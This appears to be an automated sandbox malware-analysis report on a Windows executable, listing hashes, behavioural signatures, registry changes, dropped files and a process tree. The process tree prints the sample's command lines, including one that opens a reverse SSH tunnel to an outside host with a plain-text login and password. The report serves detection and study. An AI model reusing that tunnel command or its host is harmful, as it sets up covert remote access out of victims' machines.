Analysis
-
max time kernel
99s -
max time network
177s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
03/12/2022, 01:33
Behavioral task
behavioral1
Sample
baa8b0e7b65e990b9caf3861100ecdbca2d92a2e660e2b7461cd83bc8bf72bd2.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
baa8b0e7b65e990b9caf3861100ecdbca2d92a2e660e2b7461cd83bc8bf72bd2.exe
Resource
win10v2004-20221111-en
General
-
Target
baa8b0e7b65e990b9caf3861100ecdbca2d92a2e660e2b7461cd83bc8bf72bd2.exe
-
Size
220KB
-
MD5
6d575e2b2085a08b5fea5df2150d6b72
-
SHA1
9c66c7bc798b327ac99f6baec07c4a8bc5939de2
-
SHA256
baa8b0e7b65e990b9caf3861100ecdbca2d92a2e660e2b7461cd83bc8bf72bd2
-
SHA512
b4f527ef670d32c9c9d9133aa3558746528542f7f118a07d9536892872b17d4680e00dee5051b939f6fdb20f82adb7ee10cc272cd63e9d891f706ee0c3f01911
-
SSDEEP
6144:WBbIlDMskSTJr1My5deF/pnWBSoh138n6gj1rV:4qMstrJ8n6O1rV
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 1772 cssrs.exe 1008 System.exe -
resource yara_rule behavioral1/memory/1932-56-0x0000000000400000-0x000000000041C000-memory.dmp upx -
Loads dropped DLL 4 IoCs
pid Process 2044 WScript.exe 2044 WScript.exe 2044 WScript.exe 2044 WScript.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ee1a7ec4b5e1ed42bc3f13a9e773e1770000000002000000000010660000000100002000000056bc2db3f303f835956143079944da87caffab6109b11df0fd0a72499d987c97000000000e80000000020000200000002e049865b828caf84dcf85e6f0ff750cb288bee94f6492973f279be7f73290fb2000000032a51b405ac69d8e695a3875b77d6bdf0f640568780b26f5ca8a8bf58f265a5040000000af37491e992e48c53d90f65eeebd12faf150c02e3ef54c1172a149e2b6c84c4c9e9f4130d09571f73d62e79294320c2d4d35ca7b512509286301b20685ef35b6 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{6E99A101-74FC-11ED-8F62-626C2AE6DC56} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "377051284" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 807ec55d0909d901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ee1a7ec4b5e1ed42bc3f13a9e773e17700000000020000000000106600000001000020000000fe6a8c3ca69dcaf571be1b37174f75e6e47eda6caf9e2b88892d1bb4ceb54830000000000e8000000002000020000000c860245e213a96fcd8cf50b74c139ec6ee3d5f0152db45a74cb4508d5391aa0e90000000996d8acb40f44b9ca8481b6fab53f6b58b4f7ffec95f6c028f018992f05e0bd658dd1b96be6cbf77585b10ee5517515fe1cb757b9b9fd07dc70c48c60173644f7ec3106ae029a6b43a2a84776fc6b716eadd4222772b8f4a5a156bcae9c8d24ae12c80228687e8cd44622ca4db5d15b6bafcb5f835293d9401463b6b4048e18242645e5f64d50f929d1ed75f94f8a2084000000098b19e3f978bdef87ce26327d078e724f9b1fa49c51731cab842a39a9af37d521cce49e8c52bb3d326f2ba3ed5d559d0047edde786698730fb93b2bc0e1e1173 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Data.Msi\[InternetShortcut] URL=http:\picasaweb.google.com\patrick4379\MDX?authkey=Gv1sRgCJGIycqExKS6nAE#slideshow Modified=7075A69C30A4C901C5 ata.Msi baa8b0e7b65e990b9caf3861100ecdbca2d92a2e660e2b7461cd83bc8bf72bd2.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 824 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 824 iexplore.exe 824 iexplore.exe 432 IEXPLORE.EXE 432 IEXPLORE.EXE 432 IEXPLORE.EXE 432 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 1932 wrote to memory of 1600 1932 baa8b0e7b65e990b9caf3861100ecdbca2d92a2e660e2b7461cd83bc8bf72bd2.exe 28 PID 1932 wrote to memory of 1600 1932 baa8b0e7b65e990b9caf3861100ecdbca2d92a2e660e2b7461cd83bc8bf72bd2.exe 28 PID 1932 wrote to memory of 1600 1932 baa8b0e7b65e990b9caf3861100ecdbca2d92a2e660e2b7461cd83bc8bf72bd2.exe 28 PID 1932 wrote to memory of 1600 1932 baa8b0e7b65e990b9caf3861100ecdbca2d92a2e660e2b7461cd83bc8bf72bd2.exe 28 PID 1600 wrote to memory of 2044 1600 WScript.exe 29 PID 1600 wrote to memory of 2044 1600 WScript.exe 29 PID 1600 wrote to memory of 2044 1600 WScript.exe 29 PID 1600 wrote to memory of 2044 1600 WScript.exe 29 PID 2044 wrote to memory of 1772 2044 WScript.exe 30 PID 2044 wrote to memory of 1772 2044 WScript.exe 30 PID 2044 wrote to memory of 1772 2044 WScript.exe 30 PID 2044 wrote to memory of 1772 2044 WScript.exe 30 PID 2044 wrote to memory of 1008 2044 WScript.exe 34 PID 2044 wrote to memory of 1008 2044 WScript.exe 34 PID 2044 wrote to memory of 1008 2044 WScript.exe 34 PID 2044 wrote to memory of 1008 2044 WScript.exe 34 PID 824 wrote to memory of 432 824 iexplore.exe 37 PID 824 wrote to memory of 432 824 iexplore.exe 37 PID 824 wrote to memory of 432 824 iexplore.exe 37 PID 824 wrote to memory of 432 824 iexplore.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\baa8b0e7b65e990b9caf3861100ecdbca2d92a2e660e2b7461cd83bc8bf72bd2.exe"C:\Users\Admin\AppData\Local\Temp\baa8b0e7b65e990b9caf3861100ecdbca2d92a2e660e2b7461cd83bc8bf72bd2.exe"1⤵
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Data.Msi\startup.vbs"2⤵
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Data.Msi\alg.vbe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Data.Msi\cssrs.exe"C:\Data.Msi\cssrs.exe" -d -t -l -e0.0.0.0 -i127.0.0.1 -p2103 -a4⤵
- Executes dropped EXE
PID:1772
-
-
C:\Data.Msi\System.exe"C:\Data.Msi\System.exe" -ssh -R 63583:127.0.0.1:2103 miman.zapto.org -l syslog -pw 2n30554⤵
- Executes dropped EXE
PID:1008
-
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:824 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:432
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
459B
MD58f5d6310e7fcf52fcb7509930ff14813
SHA1198e6182d515a46167c0193d4d8c0fd985bf3185
SHA256322d1f912491ab13e5362c4e8487cba773d8cde08c35ff518c9a882979204217
SHA512be491e3fa3c99525b1116b328b1ccd9d45611a6e42961ee8649ee6261713f8c07f5906bad1e7c0552f6bf9e2f6c6f9db4be15c3067f6f1dd96e6aefcbbdb05ff
-
Filesize
323KB
MD5f4bf5c28bed38e31c143abfb9bebb6d5
SHA1015f3e7ce4ff406f712b4ee1c893edfaa9276259
SHA256d79ffe88f41e98fdf29b6ee747519bb4bd546a572235dfdbd6962311455c6971
SHA51272e6ed78e42d357447ada178956b9960784fd3cfc0268ede7d4a602e1f789585d90e5ef006070034a7a9b0f35afd39000eb7fa9f6c2d06f4bddce766b85bc935
-
Filesize
323KB
MD5f4bf5c28bed38e31c143abfb9bebb6d5
SHA1015f3e7ce4ff406f712b4ee1c893edfaa9276259
SHA256d79ffe88f41e98fdf29b6ee747519bb4bd546a572235dfdbd6962311455c6971
SHA51272e6ed78e42d357447ada178956b9960784fd3cfc0268ede7d4a602e1f789585d90e5ef006070034a7a9b0f35afd39000eb7fa9f6c2d06f4bddce766b85bc935
-
Filesize
1KB
MD58f396209be8b9425c6b0a4e16e687d37
SHA1a75efadb611686e1d35089151c2823e7ecbc5c1d
SHA256a586447cd7e4ea3524b404abded0696d729f60e3d499143c6ad39708bf17777e
SHA51272be21378b0f4c2cd9c3d14641dd87fcd90c217ef4a382523f099eaf6cc85528c487e25c3be79175206fe1482d78d04298c14194cb2b961e9f9d7d2ce967ee26
-
Filesize
45KB
MD58152b1139e0f2a1d250415eb7161d799
SHA12bb712f173a7fbb365fea365cc33fdd11dde32d5
SHA256af4ab402ff5c85e9d78bdffd0c47557fa9582069e999b6344348384a4fc49a8f
SHA5124540c3a934132df2c90013c17648f040d39de8a93b013b906817c98bdc48e16b5c28f66ccc0f2a1bb65821beba220bd38788934cd1efe8e821ac42f75563aa51
-
Filesize
45KB
MD58152b1139e0f2a1d250415eb7161d799
SHA12bb712f173a7fbb365fea365cc33fdd11dde32d5
SHA256af4ab402ff5c85e9d78bdffd0c47557fa9582069e999b6344348384a4fc49a8f
SHA5124540c3a934132df2c90013c17648f040d39de8a93b013b906817c98bdc48e16b5c28f66ccc0f2a1bb65821beba220bd38788934cd1efe8e821ac42f75563aa51
-
Filesize
138B
MD549efe6d104d450d71d2ee7c513845e83
SHA1ac8423b7ea4d7d7e27b67f3c6de03244dbfd5814
SHA2568f9692895b703948cfddfd5160911c214a4ee53c219175fa12afeaef8214997f
SHA512dffc2ac38d1602b31128acd1d3f6f75f9e03c7c481febf8397b52d385b68d6a919ff1f6584941530cf9f80734cba0273d489cc74e50b24dc2eaa2ff7ac905503
-
Filesize
91B
MD57976846fe9868a7fc0328b9bb457415e
SHA1f1f6d06a5212103ec3c7077acec69d6e0af5449f
SHA2566d917694923ab0b71f0dfd3164bc873a3954d988db2a06002894d00c3d831c7d
SHA51208b6092a5716bb6413f07b19c1073bc2cbb381b21bdfe773c719990ada8f7453ac0e1ecf60f24681c219f9af469e03fe830bd2325a05bad1c6759a1b79ff40c2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize340B
MD5aeba306e220a714916b4c01b32cb8456
SHA150d0b0549712ec7a3aa217eeadf41689dd241523
SHA2566c58799b83b0be20d5b068d6c4fe0ba694663c51cff32b27d87414ba417050de
SHA51234c6e34a583b4675ee8091918a8e728e6e26e81d354551ab2f2ffe01ca98c2a353ce9244b175ded67c21966dfc98b553a01d302249689c073859911b11f74969
-
Filesize
608B
MD5aeee4938f7d8d30a3b62cbcc51323497
SHA1d64513cfb704d00c3969eb3545ff0fdb7a5e0465
SHA256390a12b58006cb0b30a4729b0d30ee021ef896cf51fb0c2429bc97168eb3d1c6
SHA512aed52d64565ec93b62893c86410e6b31f9d6ecf5128c82172725f9d6968e96ddc0f2074f4dcd0511e0829f7e544b17d77876aa1f8af1a45daeb1cf146a2c11b2
-
Filesize
323KB
MD5f4bf5c28bed38e31c143abfb9bebb6d5
SHA1015f3e7ce4ff406f712b4ee1c893edfaa9276259
SHA256d79ffe88f41e98fdf29b6ee747519bb4bd546a572235dfdbd6962311455c6971
SHA51272e6ed78e42d357447ada178956b9960784fd3cfc0268ede7d4a602e1f789585d90e5ef006070034a7a9b0f35afd39000eb7fa9f6c2d06f4bddce766b85bc935
-
Filesize
323KB
MD5f4bf5c28bed38e31c143abfb9bebb6d5
SHA1015f3e7ce4ff406f712b4ee1c893edfaa9276259
SHA256d79ffe88f41e98fdf29b6ee747519bb4bd546a572235dfdbd6962311455c6971
SHA51272e6ed78e42d357447ada178956b9960784fd3cfc0268ede7d4a602e1f789585d90e5ef006070034a7a9b0f35afd39000eb7fa9f6c2d06f4bddce766b85bc935
-
Filesize
45KB
MD58152b1139e0f2a1d250415eb7161d799
SHA12bb712f173a7fbb365fea365cc33fdd11dde32d5
SHA256af4ab402ff5c85e9d78bdffd0c47557fa9582069e999b6344348384a4fc49a8f
SHA5124540c3a934132df2c90013c17648f040d39de8a93b013b906817c98bdc48e16b5c28f66ccc0f2a1bb65821beba220bd38788934cd1efe8e821ac42f75563aa51
-
Filesize
45KB
MD58152b1139e0f2a1d250415eb7161d799
SHA12bb712f173a7fbb365fea365cc33fdd11dde32d5
SHA256af4ab402ff5c85e9d78bdffd0c47557fa9582069e999b6344348384a4fc49a8f
SHA5124540c3a934132df2c90013c17648f040d39de8a93b013b906817c98bdc48e16b5c28f66ccc0f2a1bb65821beba220bd38788934cd1efe8e821ac42f75563aa51